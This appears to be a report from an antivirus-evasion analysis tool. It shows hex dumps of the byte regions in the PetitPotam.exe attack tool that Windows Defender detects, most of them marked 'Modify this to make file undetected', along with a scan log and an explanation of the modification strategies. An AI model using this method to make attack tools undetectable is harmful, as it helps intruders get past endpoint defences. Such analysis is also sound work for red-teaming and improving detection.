0001893C   65 61 74 75 72 65 50 72 65 73 65 6E 74 00 4F 04    eaturePresent.O.
0001894C   51 75 65 72 79 50 65 72 66 6F 72 6D 61 6E 63 65    QueryPerformance
0001895C   43 6F 75 6E 74 65 72 00 1B 02 47 65 74 43 75 72    Counter...GetCur
0001896C   72 65 6E 74 50 72 6F 63 65 73 73 49 64 00 1F 02    rentProcessId...
0001897C   47 65 74 43 75 72 72 65 6E 74 54 68 72 65 61 64    GetCurrentThread
0001898C   49 64 00 00 EC 02 47 65 74 53 79 73 74 65 6D 54    Id....GetSystemT
0001899C   69 6D 65 41 73 46 69 6C 65 54 69 6D 65 00 66 03    imeAsFileTime.f.
000189AC   49 6E 69 74 69 61 6C 69 7A 65 53 4C 69 73 74 48    InitializeSListH
000189BC   65 61 64 00 82 03 49 73 44                         ead...IsD

0x1897c:
0x189c2:
0x1894c:
0x18992:
0x1891c:
0x18966:
0x189ac:
0x18930:

Match 81: 100820 (size: 46)

Dominant. Modify this to make file undetected

.rdata

000189D4   D3 02 47 65 74 53 74 61 72 74 75 70 49 6E 66 6F    ..GetStartupInfo
000189E4   57 00 7B 02 47 65 74 4D 6F 64 75 6C 65 48 61 6E    W.{.GetModuleHan
000189F4   64 6C 65 57 00 00 4B 45 52 4E 45 4C 33 32          dleW..KERNEL32

0x189d6:
0x189fa:
0x189e8:

Match 82: 100881 (size: 92)

Dominant. Modify this to make file undetected

.rdata

00018A11   6E 64 00 64 02 47 65 74 4C 61 73 74 45 72 72 6F    nd.d.GetLastErro
00018A21   72 00 00 34 05 53 65 74 4C 61 73 74 45 72 72 6F    r..4.SetLastErro
00018A31   72 00 00 34 01 45 6E 74 65 72 43 72 69 74 69 63    r..4.EnterCritic
00018A41   61 6C 53 65 63 74 69 6F 6E 00 00 C1 03 4C 65 61    alSection....Lea
00018A51   76 65 43 72 69 74 69 63 61 6C 53 65 63 74 69 6F    veCriticalSectio
00018A61   6E 00 00 13 01 44 65 6C 65 74 65 43                n....DeleteC

0x18a16:
0x18a26:
0x18a0a:
0x18a36:
0x18a4e:
0x18a66:

Match 83: 101034 (size: 167)

Dominant. Modify this to make file undetected

.rdata

00018AAA   6C 6C 6F 63 00 00 A4 05 54 6C 73 47 65 74 56 61    lloc....TlsGetVa
00018ABA   6C 75 65 00 A5 05 54 6C 73 53 65 74 56 61 6C 75    lue...TlsSetValu
00018ACA   65 00 A3 05 54 6C 73 46 72 65 65 00 AE 01 46 72    e...TlsFree...Fr
00018ADA   65 65 4C 69 62 72 61 72 79 00 B1 02 47 65 74 50    eeLibrary...GetP
00018AEA   72 6F 63 41 64 64 72 65 73 73 00 00 C7 03 4C 6F    rocAddress....Lo
00018AFA   61 64 4C 69 62 72 61 72 79 45 78 57 00 00 64 04    adLibraryExW..d.
00018B0A   52 61 69 73 65 45 78 63 65 70 74 69 6F 6E 00 00    RaiseException..
00018B1A   D5 02 47 65 74 53 74 64 48 61 6E 64 6C 65 00 00    ..GetStdHandle..
00018B2A   16 06 57 72 69 74 65 46 69 6C 65 00 77 02 47 65    ..WriteFile.w.Ge
00018B3A   74 4D 6F 64 75 6C 65 46 69 6C 65 4E 61 6D 65 57    tModuleFileNameW
00018B4A   00 00 61 01 45 78 69                               ..a.Exi

0x18b1c:
0x18b2c:
0x18ad8:
0x18ace:
0x18ac0:
0x18aa6:
0x18ae6:
0x18b0a:
0x18ab2:
0x18b38:
0x18af8:
0x18b4e:

Match 84: 101232 (size: 61)

Dominant. Modify this to make file undetected

.rdata

00018B70   D9 01 47 65 74 43 6F 6D 6D 61 6E 64 4C 69 6E 65    ..GetCommandLine
00018B80   41 00 DA 01 47 65 74 43 6F 6D 6D 61 6E 64 4C 69    A...GetCommandLi
00018B90   6E 65 57 00 48 03 48 65 61 70 41 6C 6C 6F 63 00    neW.H.HeapAlloc.
00018BA0   4C 03 48 65 61 70 46 72 65 65 00 00 9E             L.HeapFree...

0x18ba2:
0x18b96:
0x18b84:
0x18b72:

Match 85: 101323 (size: 16)

Dominant. Modify this to make file undetected

.rdata

00018BCB   57 00 00 51 02 47 65 74 46 69 6C 65 54 79 70 65    W..Q.GetFileType

0x18bd0:
0x18bc0:

Match 86: 101384 (size: 31)

Dominant. Modify this to make file undetected

.rdata

00018C08   6C 65 57 00 8F 03 49 73 56 61 6C 69 64 43 6F 64    leW...IsValidCod
00018C18   65 50 61 67 65 00 B5 01 47 65 74 41 43 50 00       ePage...GetACP.

0x18bfe:
0x18c20:
0x18c0e:

Match 87: 101430 (size: 31)

Dominant. Modify this to make file undetected

.rdata

00018C36   47 65 74 43 50 49 6E 66 6F 00 F3 03 4D 75 6C 74    GetCPInfo...Mult
00018C46   69 42 79 74 65 54 6F 57 69 64 65 43 68 61 72       iByteToWideChar

0x18c42:
0x18c36:

Match 88: 101476 (size: 61)

Dominant. Modify this to make file undetected

.rdata

00018C64   6C 74 69 42 79 74 65 00 3A 02 47 65 74 45 6E 76    ltiByte.:.GetEnv
00018C74   69 72 6F 6E 6D 65 6E 74 53 74 72 69 6E 67 73 57    ironmentStringsW
00018C84   00 00 AD 01 46 72 65 65 45 6E 76 69 72 6F 6E 6D    ....FreeEnvironm
00018C94   65 6E 74 53 74 72 69 6E 67 73 57 00 16             entStringsW..

0x18c88:
0x18c58:
0x18c6e:

Match 89: 101567 (size: 46)

Dominant. Modify this to make file undetected

.rdata

00018CBF   53 74 64 48 61 6E 64 6C 65 00 00 DA 02 47 65 74    StdHandle....Get
00018CCF   53 74 72 69 6E 67 54 79 70 65 57 00 00 B7 02 47    StringTypeW....G
00018CDF   65 74 50 72 6F 63 65 73 73 48 65 61 70 00          etProcessHeap.

0x18ccc:
0x18cde:
0x18cbc:

Match 90: 102018 (size: 5)

Dominant. Modify this to make file undetected

.data

00018E82   00 00 02 20 00                                     ... .

Match 91: 102173 (size: 5)

Dominant. Modify this to make file undetected

.data

00018F1D   00 00 00 80 00                                     .....

Match 92: 102383 (size: 5)

Dominant. Modify this to make file undetected

.data

00018FEF   00 38 A1 41 00                                     .8.A.

Test # MatchOrder ModifyPosition Match#0
.text 85b
Match#1
.text 119b
Match#2
.text 391b
Match#3
.text 51b
Match#4
.text 17b
Match#5
.text 34b
Match#6
.text 17b
Match#7
.text 85b
Match#8
.text 68b
Match#9
.text 51b
Match#10
.text 136b
Match#11
.text 204b
Match#12
.text 17b
Match#13
.text 34b
Match#14
.text 17b
Match#15
.text 17b
Match#16
.text 187b
Match#17
.text 17b
Match#18
.text 136b
Match#19
.text 68b
Match#20
.text 68b
Match#21
.text 306b
Match#22
.text 34b
Match#23
.text 170b
Match#24
.text 68b
Match#25
.text 204b
Match#26
.text 306b
Match#27
.text 102b
Match#28
.text 272b
Match#29
.text 238b
Match#30
.text 170b
Match#31
.text 544b
Match#32
.text 136b
Match#33
.text 272b
Match#34
.text 136b
Match#35
.text 136b
Match#36
.text 204b
Match#37
.text 680b
Match#38
.text 544b
Match#39
.text 272b
Match#40
.text 68b
Match#41
.text 136b
Match#42
.text 748b
Match#43
.text 612b
Match#44
.text 136b
Match#45
.text 1360b
Match#46
.text 136b
Match#47
.text 408b
Match#48
.text 408b
Match#49
.text 272b
Match#50
.text 272b
Match#51
.text 816b
Match#52
.text 952b
Match#53
.text 680b
Match#54
.text 952b
Match#55
.text 680b
Match#56
.text 1088b
Match#57
.text 816b
Match#58
.text 544b
Match#59
.text 272b
Match#60
.text 1088b
Match#61
.text 1360b
Match#62
.text 1088b
Match#63
.text 816b
Match#64
.text 272b
Match#65
.rdata 3b
Match#66
.rdata 7b
Match#67
.rdata 16b
Match#68
.rdata 4b
Match#69
.rdata 3b
Match#70
.rdata 8b
Match#71
.rdata 16b
Match#72
.rdata 16b
Match#73
.rdata 31b
Match#74
.rdata 8b
Match#75
.rdata 31b
Match#76
.rdata 8b
Match#77
.rdata 15b
Match#78
.rdata 244b
Match#79
.rdata 31b
Match#80
.rdata 153b
Match#81
.rdata 46b
Match#82
.rdata 92b
Match#83
.rdata 167b
Match#84
.rdata 61b
Match#85
.rdata 16b
Match#86
.rdata 31b
Match#87
.rdata 31b
Match#88
.rdata 61b
Match#89
.rdata 46b
Match#90
.data 5b
Match#91
.data 5b
Match#92
.data 5b
0 ISOLATED MIDDLE8
1 ISOLATED THIRDS4
2 ISOLATED FULL
3 ISOLATED FULLB
4 INCREMENTAL MIDDLE8 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 67 71 72 73 75 78 79 80 81 82 83 84 85 86 87 88 89
5 INCREMENTAL FULL 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92
6 DECREMENTAL FULL 92 91 90 89 88 87 86 85 84 83 82 81 80 79 78 77 76 75 74 73 72 71 70 69 68 67 66 65 64 63 62 61 60 59 58 57 56 55 54 53 52 51 50 49 48 47 46 45 44 43 42 41 40 39 38 37 36 35 34 33 32 31 30 29 28 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0
7 ALL MIDDLE8 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
8 ALL THIRDS4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
9 ALL FULL 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
Result

Explanation

Colors

  • Green: Not detected
  • Red: Detected by AV

Match Order

  • Isolated: Test each match individually, by themselves. At most one match is modified per scan
  • Incremental: Modify each match after another, additive. At the end, all matches are modified
  • Decremental: Modify each match after another, additive, downwards (last first)

Position

  • ModifyPosition FULL: Overwrite complete match: MMMMMMMMMMMM
  • ModifyPosition MIDDLE8: Overwrite 8 bytes in the middle of the match (partial): aaaaMMMMMMMMaaaa
  • ModifyPosition THIRD8: Overwrite 8 bytes in the first and second third of the match (partial): aaaaMMMMMMMMaaaaMMMMMMMMaaaa
[INFO    ][2023-07-21 13:34:25,700] main() :: Using file: app/upload/D3363A09CA1AA83F.PetitPotam.exe
[INFO    ][2023-07-21 13:34:25,700] handleFile() :: Handle file: app/upload/D3363A09CA1AA83F.PetitPotam.exe
[INFO    ][2023-07-21 13:34:25,701] handleFile() :: Using parser for file type EXE
[INFO    ][2023-07-21 13:34:25,724] handleFile() :: Using scanner from command line: defender
[INFO    ][2023-07-21 13:34:25,724] load() :: Loading HashCache
[INFO    ][2023-07-21 13:34:25,786] load() ::   50806 hashes loaded
[INFO    ][2023-07-21 13:34:27,256] handleFile() :: QuickCheck: D3363A09CA1AA83F.PetitPotam.exe is detected by defender and not hash based
[INFO    ][2023-07-21 13:34:27,257] handleFile() :: Scanning for matches...
[INFO    ][2023-07-21 13:34:27,257] scanForMatchesInPe() :: Section Detection: Zero section (leave all others intact)
[INFO    ][2023-07-21 13:34:27,257] findDetectedSections() :: Hide: .text -> Detected: False
[INFO    ][2023-07-21 13:34:27,258] findDetectedSections() :: Hide: .rdata -> Detected: False
[INFO    ][2023-07-21 13:34:27,258] findDetectedSections() :: Hide: .data -> Detected: False
[INFO    ][2023-07-21 13:34:27,258] findDetectedSections() :: Hide: .rsrc -> Detected: True
[INFO    ][2023-07-21 13:34:27,259] findDetectedSections() :: Hide: .reloc -> Detected: True
[INFO    ][2023-07-21 13:34:27,570] findDetectedSections() :: Hide: Header -> Detected: False
[INFO    ][2023-07-21 13:34:27,571] scanForMatchesInPe() :: 3 section(s) trigger the antivirus independantly
[INFO    ][2023-07-21 13:34:27,571] scanForMatchesInPe() ::   section: .text
[INFO    ][2023-07-21 13:34:27,571] scanForMatchesInPe() ::   section: .rdata
[INFO    ][2023-07-21 13:34:27,571] scanForMatchesInPe() ::   section: .data
[INFO    ][2023-07-21 13:34:29,643] scanForMatchesInPe() :: Launching bytes analysis on section: .text (1024-70656)
[INFO    ][2023-07-21 13:34:29,644] scan() :: Reducer Start: ScanSpeed:Normal Iteration:0 MinChunkSize:8 MinMatchSize:16
[INFO    ][2023-07-21 13:34:29,644] _printStatus() :: Reducing: 1 chunks done, found 0 matches (0 added)
[INFO    ][2023-07-21 13:34:29,648] _scanDataPart() :: Result: 1449-1466 (17b minChunk:8 X)
000005A9   CC CC CC CC CC CC CC B8 E0 B3 41 00 C3 CC CC CC    ..........A.....
000005B9   CC                                                 .
[INFO    ][2023-07-21 13:34:29,649] _scanDataPart() :: Result: 1466-1483 (17b minChunk:8 X)
000005BA   CC CC CC CC CC CC 55 8B EC 83 E4 F8 51 56 8B 75    ......U.....QV.u
000005CA   08                                                 .
[INFO    ][2023-07-21 13:34:29,649] _scanDataPart() :: Result: 1483-1500 (17b minChunk:8 X)
000005CB   6A 01 E8 36 20 00 00 83 C4 04 8D 4D 0C 51 6A 00    j..6 ......M.Qj.
000005DB   56                                                 V
[INFO    ][2023-07-21 13:34:29,649] _scanDataPart() :: Result: 1500-1517 (17b minChunk:8 X)
000005DC   50 E8 CE FF FF FF FF 70 04 FF 30 E8 D4 3C 00 00    P......p..0..<..
000005EC   83                                                 .
[INFO    ][2023-07-21 13:34:29,649] _scanDataPart() :: Result: 1517-1534 (17b minChunk:8 X)
000005ED   C4 18 5E 8B E5 5D C3 CC CC CC CC CC CC CC CC CC    ..^..]..........
000005FD   CC                                                 .
[INFO    ][2023-07-21 13:34:29,651] _scanDataPart() :: Result: 1704-1721 (17b minChunk:8 X)
000006A8   00 00 68 40 87 41 00 E8 0C FF FF FF 83 C4 04 68    ..h@.A.........h
000006B8   D8                                                 .
[INFO    ][2023-07-21 13:34:29,651] _scanDataPart() :: Result: 1721-1738 (17b minChunk:8 X)
000006B9   87 41 00 E8 FF FE FF FF 83 C4 04 68 DC 87 41 00    .A.........h..A.
000006C9   E8                                                 .
[INFO    ][2023-07-21 13:34:29,652] _scanDataPart() :: Result: 1738-1755 (17b minChunk:8 X)
000006CA   F2 FE FF FF 83 C4 04 68 08 88 41 00 E8 E5 FE FF    .......h..A.....
000006DA   FF                                                 .
[INFO    ][2023-07-21 13:34:29,652] _scanDataPart() :: Result: 1755-1772 (17b minChunk:8 X)
000006DB   83 C4 04 68 6C 88 41 00 E8 D8 FE FF FF 83 C4 04    ...hl.A.........
000006EB   68                                                 h
[INFO    ][2023-07-21 13:34:29,652] _scanDataPart() :: Result: 1772-1789 (17b minChunk:8 X)
000006EC   A0 88 41 00 E8 CB FE FF FF 83 C4 04 68 D4 88 41    ..A.........h..A
000006FC   00                                                 .
[INFO    ][2023-07-21 13:34:29,653] _scanDataPart() :: Result: 1789-1806 (17b minChunk:8 X)
000006FD   E8 BE FE FF FF 83 C4 04 68 0C 89 41 00 E8 B1 FE    ........h..A....
0000070D   FF                                                 .
[INFO    ][2023-07-21 13:34:29,653] _scanDataPart() :: Result: 1806-1823 (17b minChunk:8 X)
0000070E   FF 83 C4 04 68 48 89 41 00 E8 A4 FE FF FF 83 C4    ....hH.A........
0000071E   04                                                 .
[INFO    ][2023-07-21 13:34:29,655] _scanDataPart() :: Result: 2775-2792 (17b minChunk:8 X)
00000AD7   5D C3 3B 0D 04 A0 41 00 75 01 C3 E9 79 02 00 00    ].;...A.u...y...
00000AE7   56                                                 V
[INFO    ][2023-07-21 13:34:29,656] _scanDataPart() :: Result: 2792-2809 (17b minChunk:8 X)
00000AE8   6A 01 E8 FC 39 00 00 E8 56 06 00 00 50 E8 B6 43    j...9...V...P..C
00000AF8   00                                                 .
[INFO    ][2023-07-21 13:34:29,656] _scanDataPart() :: Result: 2809-2826 (17b minChunk:8 X)
00000AF9   00 E8 44 06 00 00 8B F0 E8 44 45 00 00 6A 01 89    ..D......DE..j..
00000B09   30                                                 0
[INFO    ][2023-07-21 13:34:29,656] _scanDataPart() :: Result: 2826-2843 (17b minChunk:8 X)
00000B0A   E8 FA 03 00 00 83 C4 0C 5E 84 C0 74 73 DB E2 E8    ........^..ts...
00000B1A   6D                                                 m
[INFO    ][2023-07-21 13:34:29,657] _scanDataPart() :: Result: 2843-2860 (17b minChunk:8 X)
00000B1B   08 00 00 68 B7 1F 40 00 E8 6E 05 00 00 E8 19 06    ...h..@..n......
00000B2B   00                                                 .
[INFO    ][2023-07-21 13:34:29,657] _scanDataPart() :: Result: 2860-2877 (17b minChunk:8 X)
00000B2C   00 50 E8 66 3D 00 00 59 59 85 C0 75 51 E8 12 06    .P.f=..YY..uQ...
00000B3C   00                                                 .
[INFO    ][2023-07-21 13:34:29,657] _scanDataPart() :: Result: 2877-2894 (17b minChunk:8 X)
00000B3D   00 E8 63 06 00 00 85 C0 74 0B 68 43 1D 40 00 E8    ..c.....t.hC.@..
00000B4D   21                                                 !
[INFO    ][2023-07-21 13:34:29,658] _scanDataPart() :: Result: 2894-2911 (17b minChunk:8 X)
00000B4E   3A 00 00 59 E8 29 06 00 00 E8 24 06 00 00 E8 FE    :..Y.)....$.....
00000B5E   05                                                 .
[INFO    ][2023-07-21 13:34:29,658] _scanDataPart() :: Result: 2911-2928 (17b minChunk:8 X)
00000B5F   00 00 E8 DD 05 00 00 50 E8 46 44 00 00 59 E8 EA    .......P.FD..Y..
00000B6F   05                                                 .
[INFO    ][2023-07-21 13:34:29,659] _scanDataPart() :: Result: 2928-2945 (17b minChunk:8 X)
00000B70   00 00 84 C0 74 05 E8 0B 40 00 00 E8 C3 05 00 00    ....t...@.......
00000B80   E8                                                 .
[INFO    ][2023-07-21 13:34:29,659] _scanDataPart() :: Result: 2945-2962 (17b minChunk:8 X)
00000B81   54 07 00 00 85 C0 75 01 C3 6A 07 E8 2D 06 00 00    T.....u..j..-...
00000B91   CC                                                 .
[INFO    ][2023-07-21 13:34:29,660] _scanDataPart() :: Result: 2962-2979 (17b minChunk:8 X)
00000B92   E8 F2 05 00 00 33 C0 C3 E8 82 07 00 00 E8 9F 05    .....3..........
00000BA2   00                                                 .
[INFO    ][2023-07-21 13:34:29,660] _scanDataPart() :: Result: 2979-2996 (17b minChunk:8 X)
00000BA3   00 50 E8 71 44 00 00 59 C3 6A 14 68 08 8F 41 00    .P.qD..Y.j.h..A.
00000BB3   E8                                                 .
[INFO    ][2023-07-21 13:34:29,661] _scanDataPart() :: Result: 2996-3013 (17b minChunk:8 X)
00000BB4   38 08 00 00 6A 01 E8 11 03 00 00 59 84 C0 0F 84    8...j......Y....
00000BC4   50                                                 P
[INFO    ][2023-07-21 13:34:29,661] _scanDataPart() :: Result: 3013-3030 (17b minChunk:8 X)
00000BC5   01 00 00 32 DB 88 5D E7 83 65 FC 00 E8 C8 02 00    ...2..]..e......
00000BD5   00                                                 .
[INFO    ][2023-07-21 13:34:29,661] _scanDataPart() :: Result: 3030-3047 (17b minChunk:8 X)
00000BD6   88 45 DC A1 DC AB 41 00 33 C9 41 3B C1 0F 84 2F    .E....A.3.A;.../
00000BE6   01                                                 .
[INFO    ][2023-07-21 13:34:29,661] _scanDataPart() :: Result: 3047-3064 (17b minChunk:8 X)
00000BE7   00 00 85 C0 75 49 89 0D DC AB 41 00 68 4C 21 41    ....uI....A.hL!A
00000BF7   00                                                 .
[INFO    ][2023-07-21 13:34:29,662] _scanDataPart() :: Result: 3064-3081 (17b minChunk:8 X)
00000BF8   68 30 21 41 00 E8 CE 3F 00 00 59 59 85 C0 74 11    h0!A...?..YY..t.
00000C08   C7                                                 .
[INFO    ][2023-07-21 13:34:29,662] _scanDataPart() :: Result: 3081-3098 (17b minChunk:8 X)
00000C09   45 FC FE FF FF FF B8 FF 00 00 00 E9 EF 00 00 00    E...............
00000C19   68                                                 h
[INFO    ][2023-07-21 13:34:29,663] _scanDataPart() :: Result: 3098-3115 (17b minChunk:8 X)
00000C1A   2C 21 41 00 68 24 21 41 00 E8 63 3F 00 00 59 59    ,!A.h$!A..c?..YY
00000C2A   C7                                                 .
[INFO    ][2023-07-21 13:34:29,663] _scanDataPart() :: Result: 3115-3132 (17b minChunk:8 X)
00000C2B   05 DC AB 41 00 02 00 00 00 EB 05 8A D9 88 5D E7    ...A..........].
00000C3B   FF                                                 .
[INFO    ][2023-07-21 13:34:29,663] _scanDataPart() :: Result: 3132-3149 (17b minChunk:8 X)
00000C3C   75 DC E8 E1 03 00 00 59 E8 69 05 00 00 8B F0 33    u......Y.i.....3
00000C4C   FF                                                 .
[INFO    ][2023-07-21 13:34:29,664] _scanDataPart() :: Result: 3149-3166 (17b minChunk:8 X)
00000C4D   39 3E 74 1B 56 E8 39 03 00 00 59 84 C0 74 10 8B    9>t.V.9...Y..t..
00000C5D   36                                                 6
[INFO    ][2023-07-21 13:34:29,666] _scanDataPart() :: Result: 3200-3217 (17b minChunk:8 X)
00000C80   74 08 FF 36 E8 EB 41 00 00 59 E8 E3 3E 00 00 8B    t..6..A..Y..>...
00000C90   F8                                                 .
[INFO    ][2023-07-21 13:34:29,666] _scanDataPart() :: Result: 3217-3234 (17b minChunk:8 X)
00000C91   E8 76 42 00 00 8B 30 E8 69 42 00 00 57 56 FF 30    .vB...0.iB..WV.0
00000CA1   E8                                                 .
[INFO    ][2023-07-21 13:34:29,666] _scanDataPart() :: Result: 3234-3251 (17b minChunk:8 X)
00000CA2   DA F9 FF FF 83 C4 0C 8B F0 E8 2E 06 00 00 84 C0    ................
00000CB2   74                                                 t
[INFO    ][2023-07-21 13:34:29,667] _scanDataPart() :: Doubling: minChunkSize: 8  minMatchSize: 16
[INFO    ][2023-07-21 13:34:29,667] _scanDataPart() :: Result: 3370-3387 (17b minChunk:16 X)
00000D2A   41 00 00 CC E8 C5 03 00 00 E9 74 FE FF FF 55 8B    A.........t...U.
00000D3A   EC                                                 .
[INFO    ][2023-07-21 13:34:29,669] _scanDataPart() :: Result: 3727-3744 (17b minChunk:16 X)
00000E8F   C2 28 3B D6 75 EA 33 C0 5E 5D C3 8B C2 EB F9 56    .(;.u.3.^].....V
00000E9F   E8                                                 .
[INFO    ][2023-07-21 13:34:29,670] _scanDataPart() :: Result: 3744-3761 (17b minChunk:16 X)
00000EA0   62 07 00 00 85 C0 74 20 64 A1 18 00 00 00 BE E0    b.....t d.......
00000EB0   AB                                                 .
[INFO    ][2023-07-21 13:34:29,671] _scanDataPart() :: Result: 3778-3795 (17b minChunk:16 X)
00000EC2   B1 0E 85 C0 75 F0 32 C0 5E C3 B0 01 5E C3 55 8B    ....u.2.^...^.U.
00000ED2   EC                                                 .
[INFO    ][2023-07-21 13:34:29,672] _scanDataPart() :: Result: 3812-3846 (34 bytes)
00000EE4   00 E8 D4 08 00 00 84 C0 75 04 32 C0 5D C3 E8 AC    ........u.2.]...
00000EF4   45 00 00 84 C0 75 0A 6A 00 E8 DB 08 00 00 59 EB    E....u.j......Y.
00000F04   E9 B0                                              ..
[INFO    ][2023-07-21 13:34:29,672] _scanDataPart() :: Result: 3846-3880 (34 bytes)
00000F06   01 5D C3 55 8B EC 80 3D E5 AB 41 00 00 74 04 B0    .].U...=..A..t..
00000F16   01 5D C3 56 8B 75 08 85 F6 74 05 83 FE 01 75 62    .].V.u...t....ub
00000F26   E8 DB                                              ..
[INFO    ][2023-07-21 13:34:29,673] _scanDataPart() :: Result: 3880-3897 (17b minChunk:16 X)
00000F28   06 00 00 85 C0 74 26 85 F6 75 22 68 E8 AB 41 00    .....t&..u"h..A.
00000F38   E8                                                 .
[INFO    ][2023-07-21 13:34:29,674] _scanDataPart() :: Result: 3914-3948 (34 bytes)
00000F4A   00 00 59 85 C0 74 2B 32 C0 EB 30 83 C9 FF 89 0D    ..Y..t+2..0.....
00000F5A   E8 AB 41 00 89 0D EC AB 41 00 89 0D F0 AB 41 00    ..A.....A.....A.
00000F6A   89 0D                                              ..
[INFO    ][2023-07-21 13:34:29,674] _scanDataPart() :: Result: 3948-3982 (34 bytes)
00000F6C   F4 AB 41 00 89 0D F8 AB 41 00 89 0D FC AB 41 00    ..A.....A.....A.
00000F7C   C6 05 E5 AB 41 00 01 B0 01 5E 5D C3 6A 05 E8 2F    ....A....^].j../
00000F8C   02 00                                              ..
[INFO    ][2023-07-21 13:34:29,676] _scanDataPart() :: Result: 4118-4152 (34 bytes)
00001016   F0 64 89 0D 00 00 00 00 59 5F 5E 5B C9 C3 55 8B    .d......Y_^[..U.
00001026   EC E8 DA 05 00 00 85 C0 74 0F 80 7D 08 00 75 09    ........t..}..u.
00001036   33 C0                                              3.
[INFO    ][2023-07-21 13:34:29,677] _scanDataPart() :: Result: 4152-4169 (17b minChunk:16 X)
00001038   B9 E0 AB 41 00 87 01 5D C3 55 8B EC 80 3D E4 AB    ...A...].U...=..
00001048   41                                                 A
[INFO    ][2023-07-21 13:34:29,677] _scanDataPart() :: Result: 4186-4220 (34 bytes)
0000105A   00 FF 75 08 E8 7A 07 00 00 59 59 B0 01 5D C3 55    ..u..z...YY..].U
0000106A   8B EC 83 3D E8 AB 41 00 FF FF 75 08 75 07 E8 8C    ...=..A...u.u...
0000107A   42 00                                              B.
[INFO    ][2023-07-21 13:34:29,678] _scanDataPart() :: Result: 4220-4254 (34 bytes)
0000107C   00 EB 0B 68 E8 AB 41 00 E8 EC 42 00 00 59 F7 D8    ...h..A...B..Y..
0000108C   59 1B C0 F7 D0 23 45 08 5D C3 55 8B EC FF 75 08    Y....#E.].U...u.
0000109C   E8 C8                                              ..
[INFO    ][2023-07-21 13:34:29,679] _scanDataPart() :: Result: 4254-4288 (34 bytes)
0000109E   FF FF FF F7 D8 59 1B C0 F7 D8 48 5D C3 55 8B EC    .....Y....H].U..
000010AE   83 EC 14 83 65 F4 00 8D 45 F4 83 65 F8 00 50 FF    ....e...E..e..P.
000010BE   15 2C                                              .,
[INFO    ][2023-07-21 13:34:29,681] _scanDataPart() :: Result: 4288-4322 (34 bytes)
000010C0   20 41 00 8B 45 F8 33 45 F4 89 45 FC FF 15 28 20     A..E.3E..E...( 
000010D0   41 00 31 45 FC FF 15 24 20 41 00 31 45 FC 8D 45    A.1E...$ A.1E..E
000010E0   EC 50                                              .P
[INFO    ][2023-07-21 13:34:29,681] _scanDataPart() :: Result: 4339-4356 (17b minChunk:16 X)
000010F3   FC 33 C1 C9 C3 8B 0D 04 A0 41 00 56 57 BF 4E E6    .3.......A.VW.N.
00001103   40                                                 @
[INFO    ][2023-07-21 13:34:29,682] _scanDataPart() :: Result: 4356-4390 (34 bytes)
00001104   BB BE 00 00 FF FF 3B CF 74 04 85 CE 75 26 E8 94    ......;.t...u&..
00001114   FF FF FF 8B C8 3B CF 75 07 B9 4F E6 40 BB EB 0E    .....;.u..O.@...
00001124   85 CE                                              ..
[INFO    ][2023-07-21 13:34:29,683] _scanDataPart() :: Result: 4390-4424 (34 bytes)
00001126   75 0A 0D 11 47 00 00 C1 E0 10 0B C8 89 0D 04 A0    u...G...........
00001136   41 00 F7 D1 5F 89 0D 00 A0 41 00 5E C3 33 C0 C3    A..._....A.^.3..
00001146   33 C0                                              3.
[INFO    ][2023-07-21 13:34:29,684] _scanDataPart() :: Result: 4424-4458 (34 bytes)
00001148   40 C3 B8 00 40 00 00 C3 68 00 AC 41 00 FF 15 30    @...@...h..A...0
00001158   20 41 00 C3 B0 01 C3 68 00 00 03 00 68 00 00 01     A.....h....h...
00001168   00 6A                                              .j
[INFO    ][2023-07-21 13:34:29,684] _scanDataPart() :: Result: 4458-4492 (34 bytes)
0000116A   00 E8 75 43 00 00 83 C4 0C 85 C0 75 01 C3 6A 07    ..uC.......u..j.
0000117A   E8 3F 00 00 00 CC C2 00 00 B8 08 AC 41 00 C3 E8    .?..........A...
0000118A   22 F4                                              ".
[INFO    ][2023-07-21 13:34:29,685] _scanDataPart() :: Result: 4492-4526 (34 bytes)
0000118C   FF FF 8B 48 04 83 08 24 89 48 04 E8 E7 FF FF FF    ...H...$.H......
0000119C   8B 48 04 83 08 02 89 48 04 C3 33 C0 39 05 0C A0    .H.....H..3.9...
000011AC   41 00                                              A.
[INFO    ][2023-07-21 13:34:29,685] _scanDataPart() :: Result: 4526-4543 (17b minChunk:16 X)
000011AE   0F 94 C0 C3 B8 F0 B3 41 00 C3 B8 EC B3 41 00 C3    .......A.....A..
000011BE   55                                                 U
[INFO    ][2023-07-21 13:34:29,687] _scanDataPart() :: Result: 4815-4832 (17b minChunk:16 X)
000012CF   03 E8 AE 00 00 00 59 5B C9 C3 E9 65 FE FF FF 6A    ......Y[...e...j
000012DF   00                                                 .
[INFO    ][2023-07-21 13:34:29,689] _scanDataPart() :: Result: 4883-4900 (17b minChunk:16 X)
00001313   B9 E8 00 00 00 00 74 03 B0 01 C3 32 C0 C3 68 2D    ......t....2..h-
00001323   1F                                                 .
